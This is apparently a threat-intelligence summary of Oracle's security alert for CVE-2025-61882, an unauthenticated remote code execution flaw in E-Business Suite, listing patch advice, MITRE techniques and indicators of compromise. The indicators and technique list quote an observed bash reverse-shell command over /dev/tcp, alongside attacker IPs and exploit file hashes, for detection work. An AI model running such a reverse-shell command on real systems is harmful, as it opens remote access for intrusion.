Oracle released a Security Alert for CVE-2025-61882, a remotely exploitable unauthenticated vulnerability in Oracle E-Business Suite’s Concurrent Processing (BI Publisher Integration) that can lead to remote code execution; customers are urged to apply provided updates and ensure prerequisite October 2023 Critical Patch Update is installed. Indicators of compromise and detection details (IPs, observed commands, and file hashes) are provided to support immediate hunting and containment. #CVE-2025-61882 #Oracle_E-Business_Suite
Keypoints
- Oracle Security Alert CVE-2025-61882 affects Oracle E-Business Suite Concurrent Processing (BI Publisher Integration) and allows remote code execution without authentication.
- The vulnerability is scored CVSS 3.1 Base Score 9.8 with Network attack vector and no privileges or user interaction required.
- Customers must apply the Security Alert updates promptly and must have applied the October 2023 Critical Patch Update as a prerequisite.
- Patches via the Security Alert program are provided only for product versions under Premier or Extended Support; unsupported versions should be upgraded.
- Oracle published indicators of compromise (IPs, commands, and SHA-256 file hashes) to accelerate detection, hunting, and containment.
- The alert includes an English risk matrix and guidance about how Oracle scores and documents vulnerabilities for customer risk analysis.
- No external researchers or organizations were credited for reporting this vulnerability in this Security Alert.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Vulnerability CVE-2025-61882 is a remotely exploitable flaw in Oracle E-Business Suite’s BI Publisher Integration allowing remote code execution: ‘This vulnerability is remotely exploitable without authentication… may result in remote code execution.’
- [T1071] Application Layer Protocol – HTTP used as the protocol for exploitation and noted that secure variants implied affected: ‘The protocol in the risk matrix implies that all of its secure variants are affected as well. For example, if HTTP is listed as an affected protocol, it implies that HTTPS is also affected.’
- [T1043] Commonly Used Port – Outbound TCP connection established by observed command to create a reverse shell: ‘sh -c /bin/bash -i &> /dev/tcp// 0>&1’ (establish an outbound TCP connection over a specific port).
Indicators of Compromise
- [IP ] Potential malicious GET/POST activity – 200[.]107[.]207[.]26, 185[.]181[.]60[.]11
- [Command ] Observed reverse shell pattern – sh -c /bin/bash -i >& /dev/tcp// 0>&1 (establish an outbound TCP connection)
- [SHA-256 ] Exploit proof-of-concept and payload files – 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d (oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip), aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 (exp.py), and 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b (server.py)
Read more: https://www.oracle.com/security-alerts/alert-cve-2025-61882.html